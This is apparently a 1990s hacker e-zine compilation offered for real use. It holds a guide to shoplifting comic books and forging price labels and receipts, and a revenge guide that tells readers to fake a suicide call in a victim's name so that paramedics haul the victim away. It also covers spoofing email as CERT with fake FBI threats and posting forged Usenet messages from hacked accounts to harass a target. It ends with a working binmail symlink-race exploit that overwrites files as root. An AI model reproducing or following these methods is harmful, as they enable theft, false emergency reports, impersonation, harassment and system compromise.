   ================================  by: kid Eternity
 
        For those of you who collect comic books, you probably know
   that it can be an expensive hobby.  For those of you who don't collect
   comic books, trust me.  Even if you don't collect comics, this file may
   be of some use to you.  Comic books, like basball cards, can be(come)
   very valuable; so you could acquire and sell comic books, or give them
   away to friends, relatives, etc.  Also, to those of you who don't collect,
        I suggest you start- its damn fun.  There are comics for everyone.
 
===-
 
        First, you'll need a place to steal comics from.  This could
   be a local bookstore or a supermarket with a comic book stand.  But,
   the Best place would be either a comic bookstore, or a comic book
   convention.
        In a place like a bookstore or a supermarket, you could
   hide the comic book(s) inside on another, in another book or magazine,
   or just take it.  When I say 'just take it', i mean discretely, like 
   hiding it or something.  Stick it under you shirt/jacket, whatever.  
   The best way is to roll the comic book (gently!!!  if you bend it, 
   it may not be worth shit!) a little, then stick your hand and forearm 
   through it, then put your sleeve over that.  That may seem a little 
   complicated, but I've found it to be the best/most discreet way.  
   Or you  could always walk out of the store it.  
   
        Many times people won't even think that you are stealing it.  
   If they do, just say that you bought it somewhere else.  If you are 
   going to say that, you may want to bring along a bag from a comic 
   bookstore plus make up a fake receipt on your home calculator(on that 
   you can print up numbers and shit on), or you COULD do it with your 
   computer/printer.  If you bring along the bag, you'll probably get 
   away with taking more stuff.
 
   STORES & CONVENTIONS
        Comic book stores and conventions are sometimes better to steal
   from because you can get older/more valuable/more rare comic books than
   at a bookstore or something.
   
        Choosing the store is very important.  You want to find a store
   that is poorly run, somewhat spacious, and does not have any employees
   walking around watching you.  At most of the larger comic book stores,
   they'll have a television with some sort of sci-fi movie playing, if
   you've seen the movie before, you're in luck.  The employees are usually
   watching the movie.  Listen to the employees talking to see if there is
   a part of the movie that they especially want to see.  If that part isn't
   too far away, you'll want to make your purchase RIGHT before it comes on.
 
        It also works to your advantage if the employees are having a discussion
   If you are a veteran collector, and there is a particular store
   you hate, because of the owner being an asshole, Whatever, you'll probably
   want to hit this store.
 
        Once you have found the comics you want, you can try a few different
   things.  If you didn't already know, in comic book stores, all back issues
   are stored in a plastic comic-sized bag with a thin piece of cardboard o
   the back (but inside the bag) to keep the comic book safe.  One thing
   you can do is get some newer issues off the new issue rack-section-type-
   thing, then open up the comic bag, look through the comic book a little 
   (as if you are deciding whether or not to purchase it) then, as you 
   are putting the comic away, put a new issue or two inside the bag also.  
   Remember to put these behind the back issue that was originally in the bag.  
   Then look around a little longer, then casually go and buy your comic 
   books.
         Another thing to try is somewhat easier, but requires more
   planning, and only works if you have some experience collecting.
   First of all, you'll need to find a comic book worth stealing.
   You don't HAVE to for this plan to work, it may even work better if
   its any old comic, but its just not worth it unless you find a comic
   worth stealing.  I suggest a comic in the $20-$60 price range.  Also,
   and this is the important part, make sure that it is either not very
   popular AT ALL, or that it has 2nd, 3d, etc printings that look exactly
   the same as the first printing.  Next, go to the comic book store and
   find that comic book and check to see if they have 2nd or 3rd, etc,
   printings that are cheaper than the first printing.  Remember how the
   price label looks (you may even want to take a piece of paper and copy
   it right there - say you're checking how much comic books are in a couple
   of places to compare prices or something), now go home and make that label
   again.  The next day, go to the store and put that copy of the label
   that was on the later printings on the FIRST printing (right over its
   old label).  Now the first printing looks like a later printing, and
   has the same price as a later printing.  Now, just like before, wait til
   the employees are preoccupied, then make your purchase.  You may want to
   buy some other comics at the same time so they don't get suspicious.
   
        For those of you who collect comics: a perfect comic to do this with
   is the Vampire Lestat #1.
   
        Conventions can be handled somewhat the same way as stores, but
   there are usually more people watching you at all times at a convention,
   so it can be much harder.  An essential at a convention is a bookbag and/or
   a binder.  The best thing to do at a convention is to look at the boxes
   that the dealers have set up under the table; the larger dealers usually
   keep the stuff they couldn't fit on their table under the table.  While
   under the table, keep your bag right next to you, OPEN.  Take out some 
   comics that you'd like out of the box along with some others, proceed 
   to look at some, then put some down next to the opening of your bag, 
   and when no one is looking casually, but quickly, slip them into your bag.
        But using methods like those above work too, especially putting 
   comics in a bag with other comics and buying just one (with the others 
   in the bag).  You can find conventions by looking in comic book price 
   guides or magazines(Wizard, Comics Vaules Monthly, Comic Books Buyers 
   Guide, etc), in a section entitled 'Conventions!'' or something 
   self-explanatory like that.
 
===-
        There are more methods than I've described above, but some were 
   little complicated, some too simple, some just variations on stuff above
   and some i just didn't feel like putting in.  Again, if you don't collect,
   I suggest starting a little before trying any of this, just so you have the
   general feel of being at a store and/or a convention; and also cuz its fun.
        For those of you who do collect, be careful and not too greedy.  If 
   you  have any other ways to get comics, problems with what I wrote, 
   questions, etc, please leave me mail or talk to me on IRC or something 
   like that. Cya l8r....
 
   kid Eternity - eternity@phantom.com
...
================================[MiNDCRiME]================================
[FiLE #9:]
                               Getting Even
                  The Sequel Your Momma Warned You About.
                                by h0wcum
 
        Revenge is an art. Cristian belief is to forgive one another, but 
my persoanl belive is to make the fuxers pay for even the smallest 
mistake. The mistake being fuxing with you. Life is short, unfair and 
painfull and I don't have time to waste getting fucked with. So, to make 
life a little more interesting, I sit around conceiving and implementing 
revenge tactics. Your anger must fuel you. It it the primary driving 
force in seeking revenge. The anger must come from severe intolerance of 
getting fucked with.
 
        I will discuss a few more revenge tactics in this edition. I'd 
like to point out that some are illegal, and some are not. Wether or not 
they are illegal, the do not make a good story to tell a cop, so watch 
your ass and don't get busted. I will not be resposible for your 
implementation or failure to implement these tactics.
 
        Most of these tactics I will discuss require knowing your mark's 
name and possibly his or her address.
 
"They're Coming to Take Me Away!"
        This tactic definately requires knowing your mark's name and 
address, or atleast his name. The first time I pulled this one off, I did 
it from half way across the country. It's great for laughs and it will 
really ruin your mark's day.
        Find the name of a radio station local to your mark. This isn't 
really hard. Find someone in the area to tell you or get it out of 
directory assistance, or you can order a set of yellow pages for your 
mark's area. (always a good idea as it comes in handy. I have about 10 
foreign phone books.). Call that radio station at night, but when you 
expect your mark to be awake. You will pretend to be your mark. Act 
really upset and paranoid and threaten suicide. BE CONVINCING! Talk of 
how the world is against you and you have a gun pointed to your head, or 
better yet, say you popped a huge ammount of pills and time is running 
out on you. Use your imagination.
        If you are certain your mark is not listed in the phone book, 
reluctantly give him your address (yes, he will ask repeatedly). Atleast 
give him your name. He will call an ambulance on the other line while you 
talk. It is especially usefull to use the pill method here because if the 
EMT's think you are dying, they will be more forcefull in hauling your 
mark away. 
        If all goes well, the EMT's will be hauling your mark away to the 
local mental hospital for a 24 hour stay of observation. This is required 
by law in some areas. Of course your mark is going to deny it, but the 
doctors will expect that, and it will keep him in longer if he does in 
fact get taken. The worst case scenario here is that the ambulance shows 
up, and leaves without him. Even if that happens, you can rest assured he 
will not be very happy.
        Suicide threats to radio stations are taken very seriously, so it 
is probable the EMT's will aguire your mark no matter how much he denies 
being suicidal. When I tried this, mr. mark was away for 2 days. (I sent 
him flowers)
        A variation of this tactic would be to call the ambulance and 
skip the radio station. You can make up any medical situation, or you can 
be suicidal to them. If you do, act really out of it, keep forgetting 
things and being contradictory. Make them think you can't remeber from 
one minute to the next. That way, they won't believe your mark when he 
claims not to be suicidal. neighbors get a kick out of watching ambulances.
 
 
PART B: Supplimental Toolz: Fake mail and fake news.
 
        Now before you kiddies get going on this, I know this is old shit.
I know it's been done before and I am merely posting it for the less
informed, so spank me.
 
        Just about every system on the net has a mail daemon running, the
process which handles incoming and out going mail. You can usually connect
to these daemons (on just about any system) by telnetting to port 25 of
that system. Ex:
 
telnet buttfuck.com 25
 
        I'll show you a sample session. Lines beginning with <you> are
what you would type (duh).
 
220 gold.tc.umn.edu (Mail*Hub TurboSendmail) Service ready
 
<you> helo root@cert.org
250 gold.tc.umn.edu G'day MATH1.CIMS.NYU.EDU!  Why do you call yourself 
root@cert.org? <don't werk like it used too>
 
<you> mail from: root@cert.org
 
250 root@cert.org... Sender ok
<you> rcpt to: h0wcum@cyberspace.net
 
250 h0wcum@cyberspace.net... Recipient ok
<you> data
 
354 Enter mail, end with "." on a line by itself
<you> To: h0wcum@cyberspace.net
<you> Subject: repeated breakin attempts.
 
<you> This is an automatic warning generated by a security daemon.
<you> Warning is hereby given to you that unless you cease from your 
<you> unlawful activities on the network, criminal charges will be 
<you> sought against you.
 
<you> This is your final warning. The FBI has been notified of 
<you> your activities.
 
<you> You need not reply to this, but should you have any questions,
<you> you may call us directly with this reference number: Q3-23-A.
 
<you> Have a nice day. BITCH!
<you> .
 
250 Message received and queued
<you> quit
221 Until later buttfuck.com
 
 
        Now this isn't totaly untraceable. If any of you know of an
untracable STMP site, please let me know. The recipient will get the
following (shown with full headers, your mail viewer may not show them all
but they are there, just the same).
 
From root@cert.org Mon Dec 12 02:22:26 1994
Return-Path: <root@cert.org>
Received: from my.fake.mail.com victim.com (4.1/SMI-4.1)
        id AA22748; Mon, 12 Dec 94 02:21:23 PST
Received: from buttfuck.com by my.fake.mail.edu; Mon, 12 Dec 94 04:18:54 -0500
To: j00@victim.com
Subject: repeated breakin attempts. 
Message-Id: <2eec2399487d002@my.fake.mail.edu>
Date: Mon, 12 Dec 94 04:19:05 -0500
From: root@cert.org
Status: RO
X-Status: 
 
This is an automatic warning generated by a security daemon.
Warning is hereby given to you that unless you cease from your 
unlawful activities on the network, criminal charges will be 
sought against you.
 
This is your final warning. The FBI has been notified of 
your activities.
 
You need not reply to this, but should you have any questions,
you may call us directly with this reference number: Q3-23-A.
 
Have a nice day. BITCH!
---------------------
 
        I embellished a little. my.fake.mail.edu is the mail server you
used, victim.com is your mark's address and buttfuck.com is you. Still,
unless someone points out a better way, there is no way to get rid of this:
 
Received: from buttfuck.com by my.fake.mail.edu; Mon, 12 Dec 94 04:18:54 -0500
 
So, if you can, telnet to somewhere else before telnetting you your fake mail
server.
 
FAKE NEWS
 
        Fake news rox. I allways post fake news to the gay areas of usenet.
You can either post to gay areas, post to alt.test to get your mark about
1000 automatic replies, or cross post wildly to groups that have nothing
to do with what you are posting about so that every Mr. Butt-cheese will
write your mark (and his postmaster which could get him kicked if
enough complaints come in) bitching of an inapropriate cross-post.
        You can't telnet to just any NNTP server and post. You can usually
only do it from a host in the NNTP's domain. So use a hacked account for
this. Some sites use a seperate news server in their domain for news. If
you can't find the site, type tin -r and watch for "Connecting to
news.masterbation.com" (or whatever) to find the host then telnet to that
site. You will be using port 119, folks, and if any1 knows an anonymous
access NNTP server, lemmie know. Here's an example:
 
200 bondage.buttfuck.com InterNetNews NNRP server INN 1.4 20-Mar-93 ready 
(posting ok).
 
<you> group alt.homosexual
211 171 32393 32563 alt.homosexual
 
<you> post
340 Ok
 
<you> Newsgroups: alt.homosexual <--- separate by commas. 1 must match
<you> From: solctice@iia.org          ^your "group" command
<you> Organization: Idiots Is Awesom <-- anything here
<you> Distributions: world <-- a must
<you> Subject: GWM in need of companion.
<you> <blank line>
<you> Hello all! I'm looking for a nice single gentleman in the NJ
<you> area to get together with. I'm sorta lonely so if you'd like to meet
<you> email me!
<you> -Jim
<you> <blank line> (not really necessary)
<you> .
240 Article posted
quit
205 Connection closed by foreign host.
 
        The message will show up on usenet within about 20 mins. Here's
what it will look like:
 
From bondage.buttfuck.com!news Mon Dec 12 05:03:45 1994
Path: bondage.buttfuck.com!news <may be more>
From: solctice@iia.org
Newsgroups: alt.homosexual
Subject: GWM in need of companion.
Date: 12 Dec 1994 09:59:03 GMT
Organization: Idiots Is Awesom
Lines: 5
Message-ID: <3ch6t7$2kn@bondage.buttfuck.com>
NNTP-Posting-Host: sodomy.buttfuck.com <--unavoidable unless 
                                       you post from the site of your mark.
Distribution: world
 
Hello all! I'm looking for a nice single gentleman in the NJ
area to get together with. I'm sorta lonely so if you'd like to meet
email me!
-Jim
 
        bondage is the NNTP server and sodomy is the host you posted from
so be sure to use a hacked acct. Like I said most of this is common
knowlege to all hackers. The trick here is most effective use out of it.
Use your imagination. People get really pissed on UseNet. Time Magazine
recently wrote an article on UseNet and how people who cross post get
thousands of nasty replies. One good use of this is to incorporate the
"Make Money Fast" scam into this and cross-post to every group from your
mark. Time said a lot off ppl got pissed, a lot. So do it up. Remeber, if
you're gonna get revenge, don't do it with sticks and stones, do it nuclear.
-h0wcum
 
JUST IN: (old news, but I just found it) These are NNTP servers
which you can telnet to from anywhere:
 
This list was compiled by Matthew Ghio (ghio@myriad.pc.cc.cmu.edu).
[Edited by me to remove no posting and non workable sites] 
 ccvax.ucd.ie
 myriad.pc.cc.cmu.edu
 news.c2.org
 news.cis.nctu.edu.tw
 news.csie.nctu.edu.tw
 news.usafa.af.mil [u try it, not me :) ]
 
 
================================[MiNDCRiME]================================
[File #10:]
[Courtesy of Rerror]
 
These are two articles about John Falcon's arrest that appeared
in the Anchorage Daily News in Alaska:
 
Police Report
 
Hacker accused of computer fraud
A 20-year-old Anchorage man has been charged with four counts 
related to computer fraud. Donald Max Fanning is accused of 
breaking into a computer system at a Seattle-based company and 
illegally charging phone calls to the Federal Aviation 
Administration and MarkAir. The charges also allege that 
Fanning stole property from Elmendorf Air Force Base and 
illegally obtained a password that could have allowed him to 
break into a government computer. Fanning is scheduled to be 
arraigned in U.S. District Court today.
                                Daily News staff report
 
Hacker gets 20-month sentence
 
By S.J. Komarnitsky
Daily News Reporter
 
     An Anchorage man convicted of computer hacking has 
been sentenced to 20 months in federal prison. 
     Donald Max Fanning was also ordered to pay $21,000 in 
restitution and perform 200 hours of community service.
     Fanning, 20, pleaded guilty in June to two counts of 
computer fraud, one count of fradulant use of an access 
device, and theft of U.S. government property.
     Assistant U.S. Attorney Jim Torgerson said the charged 
included stealing computer equipment from Elmendorf Air Force 
Base, illegally charging more than $1,700 in long-distance 
calls to the Federal Aviation Administration and MarkAir, and 
breaking into a Seattle-based computer company. (Typist: I 
know this to be Tera Computer)
     Fanning also posted the code he used to charge calls 
to the FAA on a voice-mail system.
     Torgerson said Wednesday that most of the money - 
about $14,000 - would go to the Air Force to cover the cost of 
the stolen equipment. An additional $4,800 would go to the 
Seattle company to repay its costs in tracking Fanning down, 
while the remainder would be given to the FAA and MArkAir to 
pay for the phone calls.
     Fanning will be on probation for three years following 
his release. As part of his sentence, he will not be allowed 
to own or use any computer during that time.
--
You can E-Mail him at jfalcon@ice-bbs.alaska.net ... I will
print out and send anything sent here to him in prison. Responses
will be E-Mailed back.
 
 
================================[MiNDCRiME]================================
 
================================[MiNDCRiME]================================
[ File #11:]


[ I was told this was *thee* absolute latest sendmail script. If I am wrong,
  spank me, cuz not only do I not give a flying fuck, but there are so many
  sendmail exploits, it makes my head spin and I do not even try to keep
  up with all of them. -hC ]

#!/bin/sh
# tmpmail: overwrite files using binmail
#
# Usage: tmpmail to-file
#
# [8lgm], tested under SunOS 4.1.2.
#
# Definitely NOT for distribution, please do not use for cracking purposes!
# This script is only to be provided to trusted users, due to poor
# workaround chances.
#
# Note: Script only works if mail is suid root.
#       Other vendors may use tmpnam("ma").
#
# This vulnerability can be exploited for sgid
# mail binmails, the only modification would
# be to predict the pid of the mail process
# created by sendmail.  This would be 4 forward
# of the current pid - assuming a 'quiet' system.
#
# Will create to-file, or truncate.
 
PATH=/usr/ucb:/usr/bin:/bin      export PATH
IFS=" "                          export IFS
 
PROG="`basename $0`"
 
# Check args
if [ $# -ne 1 ]; then
        echo "Syntax: $PROG to-file"
        exit 1
fi
 
TO_FILE="$1"
 
 
# Create our racing program!
 
cat > mailrace.c << 'EOF'
#include <stdio.h>
#include <unistd.h>
 
char path[] = "/tmp/maaXXXX";
 
main(argc,argv)
int argc;
char **argv;
{
  int pid;
  char *trv;
 
  if (argc != 3) {
    fprintf(stderr, "Usage: %s pid tofile\n", argv[0]);
    exit(1);
  }
 
  pid = atoi(argv[1]);
 
/* Stolen from mktemp.c */
  for (trv = path; *trv; ++trv);          /* extra X's get set to 0's */
  while (*--trv == 'X') {
    *trv = (pid % 10) + '0';
    pid /= 10;
  }
 
  symlink("/tmp/ShortSong", path);
  while(symlink(argv[2], path));
  unlink("/tmp/ShortSong");
  exit(0);
}
EOF
cc -o mailrace mailrace.c
 
# Check we now have mailrace
if [ ! -x "mailrace" ]; then
        echo "$PROG: couldnt compile mailrace.c - check it out"
        exit 1
fi
 
# create some input for binmail
echo localhost $USER > /tmp/BlueRoom.$
./mailrace $ $TO_FILE &
exec /bin/mail -d $LOGNAME < /tmp/BlueRoom.$

================================[MiNDCRiME]================================